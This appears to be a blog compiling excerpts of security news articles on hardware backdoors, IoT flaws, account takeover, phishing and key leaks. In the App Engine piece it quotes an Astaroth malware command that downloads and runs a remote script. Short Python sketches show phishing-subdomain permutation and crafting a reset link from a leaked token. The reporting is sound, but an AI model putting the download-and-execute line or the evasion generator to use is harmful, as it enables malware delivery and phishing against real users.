The key can be extracted for any chip—be it a Celeron, Pentium, or Atom—that’s based on Intel’s Goldmont architecture.

[…]

attackers can’t use Chip Red Pill and the decryption key it exposes to remotely hack vulnerable CPUs, at least not without chaining it to other vulnerabilities that are currently unknown. Similarly, attackers can’t use these techniques to infect the supply chain of Goldmont-based devices.

[…]

In theory, it might also be possible to use Chip Red Pill in an evil maid attack, in which someone with fleeting access to a device hacks it. But in either of these cases, the hack would be tethered, meaning it would last only as long as the device was turned on. Once restarted, the chip would return to its normal state. In some cases, the ability to execute arbitrary microcode inside the CPU may also be useful for attacks on cryptography keys, such as those used in trusted platform modules.

“For now, there’s only one but very important consequence: independent analysis of a microcode patch that was impossible until now,” Positive Technologies researcher Mark Ermolov said. “Now, researchers can see how Intel fixes one or another bug/vulnerability. And this is great. The encryption of microcode patches is a kind of security through obscurity.”

Source: In a first, researchers extract secret key used to encrypt Intel CPU code | Ars Technica

NSA: foreign spies used one of our crypto backdoors – we learnt some lessons but we lost them

It’s said the NSA drew up a report on what it learned after a foreign government exploited a weak encryption scheme, championed by the US spying agency, in Juniper firewall software.

However, curiously enough, the NSA has been unable to find a copy of that report.

On Wednesday, Reuters reporter Joseph Menn published an account of US Senator Ron Wyden’s efforts to determine whether the NSA is still in the business of placing backdoors in US technology products.

Wyden (D-OR) opposes such efforts because, as the Juniper incident demonstrates, they can backfire, thereby harming national security, and because they diminish the appeal of American-made tech products.

But Wyden’s inquiries, as a member of the Senate Intelligence Committee, have been stymied by lack of cooperation from the spy agency and the private sector. In June, Wyden and various colleagues sent a letter to Juniper CEO Rami Rahim asking about “several likely backdoors in its NetScreen line of firewalls.”

Juniper acknowledged in 2015 that “unauthorized code” had been found in ScreenOS, which powers its NetScreen firewalls. It’s been suggested that the code was in place since around 2008.

The Reuters report, citing a previously undisclosed statement to Congress from Juniper, claims that the networking biz acknowledged that “an unnamed national government had converted the mechanism first created by the NSA.”

Wyden staffers in 2018 were told by the NSA that a “lessons learned” report about the incident had been written. But Wyden spokesperson Keith Chu told Reuters that the NSA now claims it can’t find the file. Wyden’s office did not immediately respond to a request for comment.

The reason this malicious code was able to decrypt ScreenOS VPN connections has been attributed to Juniper’s “decision to use the NSA-designed Dual EC Pseudorandom Number Generator.”

[…]

After Snowden’s disclosures about the extent of US surveillance operations in 2013, the NSA is said to have revised its policies for compromising commercial products. Wyden and other lawmakers have tried to learn more about these policies but they’ve been stonewalled, according to Reuters.

[…]

Source: NSA: We’ve learned our lesson after foreign spies used one of our crypto backdoors – but we can’t say how exactly • The Register

And this is why you don’t put out insecure security products, which is exactly what products with a backdoor are. Here’s looking at you, UK and Australia and all the other countries trying to force insecure products on us.

‘Classified knots’: Researchers create optical framed knots to encode information

In a world first, researchers from the University of Ottawa in collaboration with Israeli scientists have been able to create optical framed knots in the laboratory that could potentially be applied in modern technologies. Their work opens the door to new methods of distributing secret cryptographic keys—used to encrypt and decrypt data, ensure secure communication and protect private information. The group recently published their findings in Nature Communications.

“This is fundamentally important, in particular from a topology-focused perspective, since framed knots provide a platform for topological quantum computations,” explained senior author, Professor Ebrahim Karimi, Canada Research Chair in Structured Light at the University of Ottawa.

“In addition, we used these non-trivial optical structures as information carriers and developed a security protocol for classical communication where information is encoded within these framed knots.”

The concept

The researchers suggest a simple do-it-yourself exercise to help us better understand framed knots, which can also be described as a surface.

“Take a narrow strip of paper and try to make a knot with it,” said first author Hugo Larocque, uOttawa alumnus and current Ph.D. student at MIT.

“The resulting object is referred to as a framed knot and has very interesting and important mathematical features.”

The group tried to achieve the same result but within an optical beam, which presents a higher level of difficulty. After a few tries (and knots that looked more like knotted strings), the group came up with what they were looking for: a knotted ribbon structure that is quintessential to framed knots.

Encryption scheme of a framed braid within a framed knot. The knot along with a pair of numbers can be used to recover the encrypted braid by means of a procedure relying on prime factorization. Credit: University of Ottawa

“In order to add this ribbon, our group relied on beam-shaping techniques manipulating the vectorial nature of light,” explained Hugo Larocque. “By modifying the oscillation direction of the light field along an “unframed” optical knot, we were able to assign a frame to the latter by “gluing” together the lines traced out by these oscillating fields.”

According to the researchers, structured light beams are being widely exploited for encoding and distributing information.

“So far, these applications have been limited to physical quantities which can be recognized by observing the beam at a given position,” said uOttawa Postdoctoral Fellow and co-author of this study, Dr. Alessio D’Errico.

“Our work shows that the number of twists in the ribbon orientation in conjunction with prime number factorization can be used to extract a so-called “braid representation” of the knot.”

“The structural features of these objects can be used to specify processing programs,” added Hugo Larocque. “In a situation where this program would want to be kept secret while disseminating it between various parties, one would need a means of encrypting this “braid” and later deciphering it. Our work addresses this issue by proposing to use our optical framed knot as an encryption object for these programs which can later be recovered by the braid extraction method that we also introduced.”

“For the first time, these complicated 3-D structures have been exploited to develop new methods for the distribution of secret cryptographic keys. Moreover, there is a wide and strong interest in exploiting topological concepts in quantum computation, communication and dissipation-free electronics. Knots are described by specific topological properties too, which were not considered so far for cryptographic protocols.”

Rendition of the reconstructed structure of a framed trefoil knot generated within an optical beam. Credit: University of Ottawa

[…]

The paper “Optical framed knots as information carriers” was recently published in Nature Communications.


More information: Hugo Larocque et al, Optical framed knots as information carriers, Nature Communications (2020). DOI: 10.1038/s41467-020-18792-z

Source: ‘Classified knots’: Researchers create optical framed knots to encode information

Facebook Login Issues Are Locking Oculus Quest 2 Owners Out of Their Devices, turning them into paperweights

Owners of the brand-new Oculus Quest 2—the first VR headset which requires a Facebook account to use—are finding themselves screwed out of their new purchases by Facebook’s account verification system.

As first reported by UploadVR this week, some Oculus Quest 2 owners are finding that Facebook’s reportedly AI-powered account verification system is demanding they upload a photo before they can proceed with logging in. Others who had previously suspended their Facebook accounts were instantly banned upon reactivation and reported they were subsequently unable to create a new account, or said they were locked out when trying to merge their old Oculus usernames with their Facebook accounts. Facebook’s failure prompt gave users no way to appeal directly, essentially turning the $300 units into expensive bricks.

On the Oculus subreddit, one user reported that they had uploaded a photo ID to Facebook and received a response stating that “we have already reviewed this decision and it can’t be reversed.”

[…]

Source: Facebook Login Issues Are Locking Oculus Quest 2 Owners Out of Their Devices

Yay cloud!

Backdoorer the Xplora: Kids’ smart-watches can secretly take pics, record audio on command by encrypted texts

The Xplora 4 smartwatch, made by Chinese outfit Qihoo 360 Technology Co, and marketed to children under the Xplora brand in the US and Europe, can covertly take photos and record audio when activated by an encrypted SMS message, says Norwegian security firm Mnemonic.

This backdoor is not a bug, the finders insist, but a deliberate, hidden feature. Around 350,000 watches have been sold so far, Xplora says. Exploiting this security hole is non-trivial, we note, though it does reveal the kind of remotely accessible functionality left in the firmware of today’s gizmos.

“The backdoor itself is not a vulnerability,” said infosec pros Harrison Sand and Erlend Leiknes in a report on Monday. “It is a feature set developed with intent, with function names that include remote snapshot, send location, and wiretap. The backdoor is activated by sending SMS commands to the watch.”

The researchers suggest these smartwatches could be used to covertly capture photos with the built-in camera, to track the wearer’s location, and to conduct wiretapping via the built-in mic. They have not claimed any such surveillance has actually taken place. The watches are marketed as a child’s first phone, we’re told, and thus contain a SIM card for connectivity (with an associated phone number). Parents can track the whereabouts of their offspring using an app that locates the wearer of the watch.

It is a feature set developed with intent, with function names that include remote snapshot, send location, and wiretap. The backdoor is activated by sending SMS commands to the watch

Xplora contends the security issue is just unused code from a prototype and has now been patched. But the company’s smartwatches were among those cited by Mnemonic and Norwegian Consumer Council in 2017 for assorted security and privacy concerns.

Sand and Leiknes note in their report that while the Norwegian company Xplora Mobile AS distributes the Xplora watch line in Europe and, as of September, in the US, the hardware was made by Qihoo 360 and 19 of its 90 Android-based applications come from the Chinese company.

They also point out that in June, the US Department of Commerce placed the Chinese and UK business groups of Qihoo 360 on its Entities List, a designation that limits Qihoo 360’s ability to do business with US companies. US authorities claim, without offering any supporting evidence, that the company represents a potential threat to US national security.

In 2012, a report by a China-based civilian hacker group called Intelligent Defense Friends Laboratory accused Qihoo 360 of having a backdoor in its 360 secure browser [PDF].

In March, Qihoo 360 claimed that the US Central Intelligence Agency has been conducting hacking attacks on China for over a decade. Qihoo 360 did not immediately respond to a request for comment.

According to Mnemonic, the Xplora 4 contains a package called “Persistent Connection Service” that runs during the Android boot process and iterates through the installed apps to construct a list of “intents,” commands for invoking functionality in other apps.

With the appropriate Android intent, an incoming encrypted SMS message received by the Qihoo SMS app could be directed through the command dispatcher in the Persistent Connection Service to trigger an application command, like a remote memory snapshot.
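Mnemonic’s description of the dispatcher suggests a simple lookup pattern: a decrypted SMS command selects an action to fire. The sketch below is purely conceptual Python, not the watch’s actual Android code; the command names and action strings are invented for illustration:

```python
# Conceptual sketch of the command-dispatcher pattern described above.
# All command codes and action strings here are hypothetical.
COMMAND_TABLE = {
    "CMD_SNAPSHOT": "com.example.camera.REMOTE_SNAPSHOT",
    "CMD_LOCATION": "com.example.gps.SEND_LOCATION",
    "CMD_WIRETAP":  "com.example.mic.START_RECORDING",
}

def dispatch(sms_command: str) -> str:
    """Route a decrypted SMS command to the matching app action.

    In the real service this lookup would fire an Android intent at
    the app that registered the matching action.
    """
    action = COMMAND_TABLE.get(sms_command)
    if action is None:
        raise ValueError(f"unknown command: {sms_command}")
    return action

print(dispatch("CMD_SNAPSHOT"))
```

The point of the pattern is that the watch itself contains no exploit code in the usual sense: it is ordinary, intentional plumbing that becomes a backdoor because it is reachable by anyone holding the phone number and encryption key.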

Exploiting this backdoor requires knowing the phone number of the target device and its factory-set encryption key. This data is available to Qihoo and Xplora, according to the researchers, and can also be pulled off the device physically using specialist tools. This basically means ordinary folks aren’t going to be hacked, either by the manufacturer under orders from Beijing or by opportunistic miscreants attacking gizmos in the wild, though it is an issue for persons of interest. It also highlights the kind of code left lingering in mass-market devices.

Source: Backdoorer the Xplora: Kids’ smart-watches can secretly take pics, record audio on command by encrypted texts • The Register

Apple’s T2 custom secure boot chip is not only insecure, it cannot be fixed without replacing the silicon

Apple’s T2 security chip is insecure and cannot be fixed, a group of security researchers report.

Over the past three years, a handful of hackers have delved into the inner workings of the custom silicon, fitted inside recent Macs, and found that they can use an exploit developed for iPhone jailbreaking, checkm8, in conjunction with a memory controller vulnerability known as blackbird, to compromise the T2 on macOS computers.

The primary researchers involved – @h0m3us3r, @mcmrarm, @aunali1 and Rick Mark (@su_rickmark) – expanded on the work @axi0mX did to create checkm8 and adapted it to target the T2, in conjunction with a group that built checkm8 into their checkra1n jailbreaking software. Mark on Wednesday published a timeline of relevant milestones.

The T2, which contains a so-called secure enclave processor (SEP) intended to safeguard Touch ID data, encrypted storage, and secure boot capabilities, was announced in 2017. Based on the Arm-compatible A10 processor used in the iPhone 7, the T2 first appeared in devices released in 2018, including MacBook Pro, MacBook Air, and Mac mini. It has also shown up in the iMac Pro and was added to the Mac Pro in 2019, and the iMac in 2020.

The checkm8 exploit, which targets a use-after-free vulnerability, allows an attacker to run unsigned code during recovery mode, or Device Firmware Update (DFU) mode. It has been modified to enable a tethered debug interface that can be used to subvert the T2 chip.

So with physical access to your T2-equipped macOS computer, an appropriate USB-C cable, and checkra1n 0.11, you – or a miscreant in your position – can obtain root access and kernel execution privileges on a T2-defended Mac. This allows you to alter macOS, load arbitrary kernel extensions, and expose sensitive data.

According to Belgian security biz ironPeak, it also means that firmware passwords and remote device locking capabilities, instituted via MDM or the FindMy app, can be undone.

Compromising the T2 doesn’t defeat macOS FileVault2 disk encryption, but it would allow someone to install a keylogger to obtain the encryption key, or to attempt to crack the key with a brute-force attack.

[…]

Unfortunately, it appears the T2 cannot be fixed. “Apple uses SecureROM in the early stages of boot,” explained Rick Mark in a blog post on Monday. “ROM cannot be altered after fabrication and is done so to prevent modifications. This usually prevents an attacker from placing malware at the beginning of the boot chain, but in this case also prevents Apple from fixing the SecureROM.”

Source: Apple’s T2 custom secure boot chip is not only insecure, it cannot be fixed without replacing the silicon • The Register

Listening in on your XR11 remote from 20m away

Guardicore discovered a new attack vector on Comcast’s XR11 voice remote that would have allowed attackers to turn it into a listening device – potentially invading your privacy in your living room. Prior to its remediation by Comcast, the attack, dubbed WarezTheRemote, was a very real security threat: with more than 18 million units deployed across homes in the USA, the XR11 is one of the most widespread remote controls in existence.

WarezTheRemote used a man-in-the-middle attack to exploit the remote’s RF communication with the set-top box and its over-the-air firmware upgrades: by pushing a malicious firmware image back to the remote, attackers could have used it to continuously record audio without any user interaction.

The attack did not require physical contact with the targeted remote or any interaction from the victim – any hacker with a cheap RF transceiver could have used it to take over an XR11 remote. Using a 16dBi antenna, we were able to listen to conversations happening in a house from about 65 feet away. We believe this could have been amplified easily using better equipment.

We worked with Comcast’s security team after finding the vulnerability and they have released fixes that remediate the issues that made the attack possible.

You can download our full research paper for the technical details of the WarezTheRemote project. You’ll find much more information on the reverse-engineering process inside, as well as a more bits-and-bytes perspective on the vulnerability and the exploit.

Source: A New Attack Vector Discovered in Comcast’s Remote | Guardicore

Smart male chastity hack could lock all dicks up permanently, require grinder to unlock. Also tells anyone where you are

  • Smart Bluetooth male chastity lock, designed for user to give remote control to a trusted 3rd party using mobile app/API
  • Multiple API flaws meant anyone could remotely lock all devices and prevent users from releasing themselves
  • Removal then requires an angle grinder or similar, used in close proximity to delicate and sensitive areas
  • Precise user location data also leaked by API, including personal information and private chats
  • Vendor initially responsive, then missed three remediation deadlines they set themselves over a 6 month period
  • Then finally refused to interact any further, even though the majority of issues had been resolved in the migration to the v2 API; the v1 API was inexcusably left available
  • This post is published in coordination with Internet of Dongs.

Smart adult toys and us

We haven’t written about smart adult toys in a long time, but the Qiui Cellmate chastity cage was simply too interesting to pass by. We were tipped off about the adult chastity device, designed to lock up the wearer’s appendage.

There are other male chastity devices available but this is a Bluetooth (BLE) enabled lock and clamp type mechanism with a companion mobile app. The idea is that the wearer can give control of the lock to someone else.

We are not in the business of kink shaming. People should be able to use these devices safely and securely without the risk of sensitive personal data being leaked.

The security of the teledildonics field is interesting in its own right. It’s worth noting that sales of smart adult toys have risen significantly during the recent lockdown.

What is the risk to users?

We discovered that remote attackers could prevent the Bluetooth lock from being opened, permanently locking the user in the device. There is no physical unlock. The tube is locked onto a ring worn around the base of the genitals, making things inaccessible. An angle grinder or other suitable heavy tool would be required to cut the wearer free.

Location, plaintext password and other personal data was also leaked, without need for authentication, by the API.

We had particular problems during the disclosure process, as we would usually ask the vendor to take down a leaky API whilst remediation was being implemented. However, anyone currently using the device when the API was taken offline would also be permanently locked in!

As you will see in the disclosure timeline at the bottom of this post, some issues were remediated but others were not, and the vendor simply stopped replying to us, journalists, and retailers. Given the trivial nature of finding some of these issues, and that the company is working on another device that poses even greater potential physical harm (an “internal” chastity device), we have felt compelled to publish these findings at this point.

Source: Smart male chastity lock cock-up | Pen Test Partners

Grindr security flaw let anyone take over any accounts easily

Grindr, one of the world’s largest dating and social networking apps for gay, bi, trans, and queer people, has fixed a security vulnerability that allowed anyone to hijack and take control of any user’s account using only their email address.

Wassime Bouimadaghene, a French security researcher, found the vulnerability and reported the issue to Grindr. When he didn’t hear back, Bouimadaghene shared details of the vulnerability with security expert Troy Hunt to help.

The vulnerability was fixed a short time later.

Hunt tested and confirmed the vulnerability with help from a test account set up by Scott Helme, and shared his findings with TechCrunch.

Bouimadaghene found the vulnerability in how the app handles account password resets.

To reset a password, Grindr sends the user an email with a clickable link containing an account password reset token. Once clicked, the user can change their password and is allowed back into their account.

But Bouimadaghene found that Grindr’s password reset page was leaking password reset tokens to the browser. That meant anyone who knew a user’s registered email address could trigger a password reset and, if they knew where to look, collect the reset token from the browser.

Secret tokens used to reset Grindr account passwords, which are only supposed to be sent to a user’s inbox, were leaking to the browser. (Image: Troy Hunt/supplied)

The clickable link that Grindr generates for a password reset is formatted the same way, meaning a malicious user could easily craft their own clickable password reset link — the same link that was sent to the user’s inbox — using the leaked password reset token from the browser.

With that crafted link, the malicious user can reset the account owner’s password and gain access to their account and the personal data stored within, including account photos, messages, sexual orientation and HIV status and last test date.

“This is one of the most basic account takeover techniques I’ve seen,” Hunt wrote.
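The failure and the fix both come down to where the reset token appears. A minimal Python sketch of the pattern, with invented field names and an example URL shape (not Grindr’s real endpoints):

```python
# The flaw: the reset endpoint's response to the browser embedded the
# same token that was emailed to the user. (Field names are invented.)
leaked_response = {
    "status": "email_sent",
    "resetToken": "abc123",  # secret; should never appear in the response
}

def craft_reset_link(token: str) -> str:
    # The emailed link follows a predictable format, so the leaked token
    # is all an attacker needs to rebuild it. Illustrative URL shape only.
    return f"https://example-app.test/reset-password?token={token}"

attacker_link = craft_reset_link(leaked_response["resetToken"])
print(attacker_link)

# The fix: the token travels only in the email; the API response merely
# confirms the send without echoing the secret.
safe_response = {"status": "email_sent"}
```

The design principle is that a password-reset token is a bearer credential: any channel that carries it, including an API response visible in the browser’s developer tools, is as sensitive as the victim’s inbox.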

Google App Engine feature abused to create unlimited phishing pages

A newly discovered technique by a researcher shows how Google’s App Engine domains can be abused to deliver phishing and malware while remaining undetected by leading enterprise security products.

Google App Engine is a cloud-based service platform for developing and hosting web apps on Google’s servers.

While reports of phishing campaigns leveraging enterprise cloud domains are nothing new, what makes Google App Engine’s infrastructure risky is how its subdomains are generated and paths are routed.

Practically unlimited subdomains for one app

Typically, scammers use cloud services to create a malicious app that gets assigned a subdomain. They then host phishing pages there, or use the app as a command-and-control (C2) server to deliver a malware payload.

But the URL structures are usually generated in a manner that makes them easy to monitor and block using enterprise security products, should there be a need.

For example, a malicious app hosted on Microsoft Azure services may have a URL structure like: https://example-subdomain.app123.web.core.windows.net/…

Therefore, a cybersecurity professional could block traffic to and from this particular app by simply blocking requests to and from this subdomain. This wouldn’t prevent communication with the rest of the Microsoft Azure apps that use other subdomains.

It gets a bit more complicated, however, in the case of Google App Engine.

Security researcher Marcel Afrahim demonstrated an intended design of Google App Engine’s subdomain generator, which can be abused to use the app infrastructure for malicious purposes, all while remaining undetected.

Google’s appspot.com domain, which hosts apps, has the following URL structure:

VERSION-dot-SERVICE-dot-PROJECT_ID.REGION_ID.r.appspot.com

A subdomain, in this case, does not represent just an app; it encodes an app’s version, the service name, the project ID, and the region ID.

But the most important point to note here is, if any of those fields are incorrect, Google App Engine won’t show a 404 Not Found page, but instead show the app’s “default” page (a concept referred to as soft routing).

“Requests are received by any version that is configured for traffic in the targeted service. If the service that you are targeting does not exist, the request gets Soft Routed,” states Afrahim, adding:

“If a request matches the PROJECT_ID.REGION_ID.r.appspot.com portion of the hostname, but includes a service, version, or instance name that does not exist, then the request is routed to the default service, which is essentially your default hostname of the app.”

Essentially, this means there are a lot of permutations of subdomains to get to the attacker’s malicious app. As long as every subdomain has a valid “project_ID” field, invalid variations of other fields can be used at the attacker’s discretion to generate a long list of subdomains, which all lead to the same app.

For example, as shown by Afrahim, both URLs below, which look drastically different, represent the same app hosted on Google App Engine.

https://random123-random123-random123-dot-bad-app-2020.ue.r.appspot.com
https://insertanythingyouwanthere-xyz123-xyz123-dot-bad-app-2020.ue.r.appspot.com
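The permutation space Afrahim describes is easy to picture in code. A short Python sketch, reusing the hypothetical project ID and region from the URLs above; only those two fields have to be valid, the rest is soft-routed:

```python
import random
import string

# Hypothetical app: only the project ID and region ID must be correct.
PROJECT_ID = "bad-app-2020"
REGION_ID = "ue"

def random_label(n: int = 10) -> str:
    """Generate a random DNS-safe label."""
    return "".join(random.choices(string.ascii_lowercase + string.digits, k=n))

def make_subdomain() -> str:
    # URL shape: VERSION-dot-SERVICE-dot-PROJECT_ID.REGION_ID.r.appspot.com
    # Invalid version/service names are soft-routed to the default service,
    # so any junk in those positions still reaches the same app.
    return (f"https://{random_label()}-dot-{random_label()}-dot-"
            f"{PROJECT_ID}.{REGION_ID}.r.appspot.com")

# Every generated hostname looks unique, yet all resolve to one app.
urls = {make_subdomain() for _ in range(1000)}
print(len(urls))
```

This is why per-hostname blocklists fail here: the defender would have to enumerate an effectively unbounded set of names, while the attacker only ever operates one app.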

“Verified by Google Trust Services” means trusted by everyone

The fact that a single malicious app is now represented by multiple permutations of its subdomains makes it hard for sysadmins and security professionals to block malicious activity.

But further, to a technologically unsavvy user, all of these subdomains would appear to be a “secure site.” After all, the appspot.com domain and all its subdomains come with the seal of “Google Trust Services” in their SSL certificates.

Google App Engine sites showing valid SSL certificate with “Verified by: Google Trust Services” text
Source: Afrahim

Even further, most enterprise security solutions such as Symantec WebPulse web filter automatically allow traffic to trusted category sites. And Google’s appspot.com domain, due to its reputation and legitimate corporate use cases, earns an “Office/Business Applications” tag, skipping the scrutiny of web proxies.

Automatically trusted by most enterprise security solutions

On top of that, the large number of subdomain variations renders any blocking approach based on Indicators of Compromise (IOCs) useless.

A screenshot of a test app created by Afrahim along with a detailed “how-to” demonstrates this behavior in action.

In the past, Cloudflare’s domain generation had a similar design flaw, which the Astaroth malware would exploit via the following command when fetching its stage 2 payload:

%ComSpec% /c “echo GetObject(“script:hxxps://xsw%RANDOM%nnccccmd95c22[.]cloudflareworkers[.]com/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371proud-glade-92ec.ativadormasterplus.workers.dev/?09/”)” > %temp%\Lqncxmm:vbvvjjh.js && start wscript.exe %temp%\Lqncxmm:vbvvjjh.js”

This would essentially launch a Windows command prompt and substitute a random number for %RANDOM%, making the payload URL truly dynamic.

“And now you have a script that downloads the payload from different URL hostnames each time is run and would render the network IOC of such hypothetical sample absolutely useless. The solutions that rely on single run on a sandbox to obtain automated IOC would therefore get a new Network IOC and potentially new file IOC if script is modified just a bit,” said the researcher.

Delivering malware via Google App Engine subdomain variations while bypassing IOC blocks

Actively exploited for phishing attacks

Security engineer and pentester Yusuke Osumi tweeted last week how a Microsoft phishing page hosted on the appspot.com subdomain was exploiting the design flaw Afrahim has detailed.

Osumi additionally compiled a list of over 2,000 subdomains generated dynamically by the phishing app—all of them leading to the same phishing page.

Active exploitation of Google App Engine subdomains in phishing attacks
Source: Twitter

This recent example has shifted the focus of discussion from how Google App Engine’s flaw can be potentially exploited to active phishing campaigns leveraging the design flaw in the wild.

“Use a Google Drive/Service phishing kit on Google’s App Engine and normal user would not just realize it is not Google which is asking for credentials,” concluded Afrahim in his blog post.

Source: Google App Engine feature abused to create unlimited phishing pages

Twitter warns of possible API keys leak through browser caching

Twitter is notifying developers today about a possible security incident that may have impacted their accounts.

The incident was caused by incorrect instructions that the developer.twitter.com website sent to users’ browsers.

The developer.twitter.com website is the portal where developers manage their Twitter apps and attached API keys, but also the access token and secret key for their Twitter account.

In an email sent to developers today, Twitter said that its developer.twitter.com website told browsers to create and store copies of the API keys, account access token, and account secret inside their cache, a section of the browser where data is saved to speed up the process of loading the page when the user accessed the same site again.

This might not be a problem for developers using their own browsers, but Twitter is warning developers who may have used public or shared computers to access the developer.twitter.com website — in which case, their API keys are now most likely stored in those browsers.

“If someone who used the same computer after you in that temporary timeframe knew how to access a browser’s cache, and knew what to look for, it is possible they could have accessed the keys and tokens that you viewed,” Twitter said.

“Depending on what pages you visited and what information you looked at, this could have included your app’s consumer API keys, as well as the user access token and secret for your own Twitter account,” Twitter said.
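The underlying fix is standard HTTP cache hygiene: pages that display secrets should tell the browser never to store the response. A minimal sketch of the relevant headers (the function is hypothetical; the header semantics are standard HTTP):

```python
def secret_page_headers() -> dict:
    """Headers a page serving API keys or tokens should set so browsers
    never write the response to the shared on-disk cache."""
    return {
        # "no-store" forbids caching the response entirely; "no-cache"
        # alone would still permit a stored copy that must be revalidated.
        "Cache-Control": "no-store",
        # Legacy fallback for old HTTP/1.0 intermediaries.
        "Pragma": "no-cache",
    }

headers = secret_page_headers()
print(headers["Cache-Control"])
```

On a shared machine the browser cache persists across users, which is exactly the window Twitter describes; `no-store` closes it by keeping the secret out of disk storage in the first place.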

Source: Twitter warns of possible API keys leak | ZDNet